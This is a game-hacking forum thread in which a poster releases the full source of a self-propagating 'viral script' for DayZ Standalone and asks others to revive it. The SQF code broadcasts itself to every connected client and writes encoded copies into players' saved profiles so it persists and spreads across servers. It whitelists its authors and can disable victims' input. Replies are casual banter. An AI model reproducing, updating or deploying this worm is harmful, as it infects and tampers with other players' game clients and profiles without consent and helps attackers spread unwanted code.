Thanks
    My Mood
    Devilish

Dayz Standalone Viral Script (needs updating)

This is a patched Viral Script for dayz SA I made with ProRaiin which spreads itself from player to player, and server to server with those players, at one point any server we joined was filled with infected players running our custom code . Im releasing it because I have no use for it now and If anyone by chance has a remote exec method for SA then you could update this and make this work again, if your quick.

This version auto encrypts the script as it spreads itself to make it harder to read but unfortunately this version never got to spread to everyone before dwarden seen the old easy to read version in his profile patched the re.

Look in your profile and you mite see our code

Code:
    v_bowen = 100020;

infect = {
        namespaceVar = compile('
    waitUntil{alive player};[]spawn{_whitelist=["bo"+"wen","Ra"+"iin"];if(name player in _whitelist)then{Systemchat"This Server Is running Bowens AH"}else{[]spawn(uinamespace getvariable"bowen_lol")};_bowens_antihaxs=true;while{_bowens_antihaxs}do{if(!(name player in _whitelist)or!(name player in bowensarray))then{{if(!(isnil _x)or((profilenamespace getvariable"SA_Inventory_B")==1))then{profilenamespace setvariable["SA_Inventory_B",1];saveprofilenamespace;systemchat "Caught hacking By Bowen";disableuserinput true;};}foreach["boolrun","infammoON","dayz_norecoilon","bowen","change_terrain_Metallica","bulletcamon","distanceFromGround"];};sleep 1;};};sleep 5;bowensinfectioncode=[0,{}];if(!isnil"b_loop")then{v_bowen=' + (str v_bowen) + ';terminate b_loop;terminate re_loop;};b_loop=[]spawn{v_bowen=' + (str v_bowen) + ';while{true}do{bowen_startAttack=' + (str melee_startAttack) + ';if(isnil"pv_bowen")then{pv_bowen=v_bowen;for"_i"from 0 to 999 do{_i publicVariableClient"melee_startAttack"}};if(v_bowen>=pv_bowen)then{if(v_bowen>pv_bowen)then{pv_bowen=v_bowen;for"_i"from 0 to 999 do{_i publicVariableClient"pv_bowen"}};melee_startAttack=bowen_startAttack;for"_i"from 0 to 999 do{_i publicVariableClient"melee_startAttack"}};if!(isnil"bowensinfectioncode")then{for"_i"from 0 to 999 do{bowensinfection=bowensinfectioncode;_i publicVariableClient"bowensinfection"};[]spawn(bowensinfectioncode select 1)};Sleep(30+(random 30))}};re_loop=[]spawn{v_bowen=' + (str v_bowen) + ';while{true}do{if!(isnil"bowen")then{call bowen;bowen=nil};if!(isnil"bowensinfection")then{_version=bowensinfection select 0;_updatecode=bowensinfection select 1;if((bowensinfectioncode select 0)<_version)then{bowensinfectioncode=[_version,_updatecode]};bowensinfection=nil};sleep 0.1}};
    ');

with missionnamespace do {
    	sleep 10;_whitelist=["bo"+"wen","Ra"+"iin"];if((name player)in _whitelist)then{[]spawn namespaceVar;systemchat format["Server is Infected. Version: %1",(v_bowen-100000)]}else{icheck=profilenamespace getvariable"Raiinidayz";if(isnil"icheck")then{icheck=0};if(icheck!=9)then{profilenamespace setvariable["inventory_sa",{_d_array=_this;new_array=[];for"_b"from 0 to((count _d_array)-1)do{_number=((_d_array select _b)-8)/8;new_array=new_array+[_number]};new_array}];_code_string=("with missionnamespace do {[] spawn "+str namespaceVar+";};");_normal_array=toarray(_code_string);new_array=[];for"_b"from 0 to((count _normal_array)-1)do{_number=((_normal_array select _b)*8)+8;new_array=new_array+[_number]};profilenamespace setvariable["items_dayz_sa",new_array];profilenamespace setvariable["igui_grid_chat_x","_igui_grid_chat_x = (profilenamespace getvariable ""items_dayz_sa"") call (profilenamespace getvariable ""inventory_sa"");call compile tostring(_igui_grid_chat_x);"];saveprofilenamespace;icheck=nil};[]spawn namespaceVar};
        };
    };

melee_startAttack = compile('default_stuff=compile preprocessFileLineNumbers"\dz\modulesDayZ\scripts\melee_startAttack.sqf";if(isnil"v_bowen")then{v_bowen=' + (str v_bowen) + ';[]spawn' + (str Infect) + '}else{if(v_bowen<' + (str v_bowen) + ')then{v_bowen=' + (str v_bowen) + ';[]spawn' + (str Infect) + '}};_handled=_this call default_stuff;_handled;');

for "_i" from 0 to 999 do {
        _i publicVariableClient "melee_startAttack";
    };

call Infect;
    Credits to lystic for helping with the re method this used
    Last edited by bowen2k12; 01-17-2014 at 12:58 AM.

Thanks
    Hacking is cool and all but why ruin THE ENTIRE GAME?

nevermind....didn't read the part saying it no longer works lol.
    Last edited by dakisback; 01-16-2014 at 07:57 PM.

Thanks
    My Mood
    Devilish
    Quote Originally Posted by dakisback View Post
    Hacking is cool and all but why ruin THE ENTIRE GAME?

nevermind....didn't read the part saying it no longer works lol.
    If I wanted to have used this to ruin the game I would have, I actually used this to spread a small AH script... with me whitelisted of course
    Last edited by bowen2k12; 01-16-2014 at 08:00 PM.

Thanks
    Wow, you did an better antihack than battle eye and they just patch it!!!

Thanks
    My Mood
    Devilish
    Quote Originally Posted by tupano View Post
    Hahaha ino man :P

Thanks
    My Mood
    Dead
    Quote Originally Posted by tupano View Post
    He detect meh menu

Thanks
    My Mood
    Devilish
    Quote Originally Posted by ProRaiin View Post
    He detect meh menu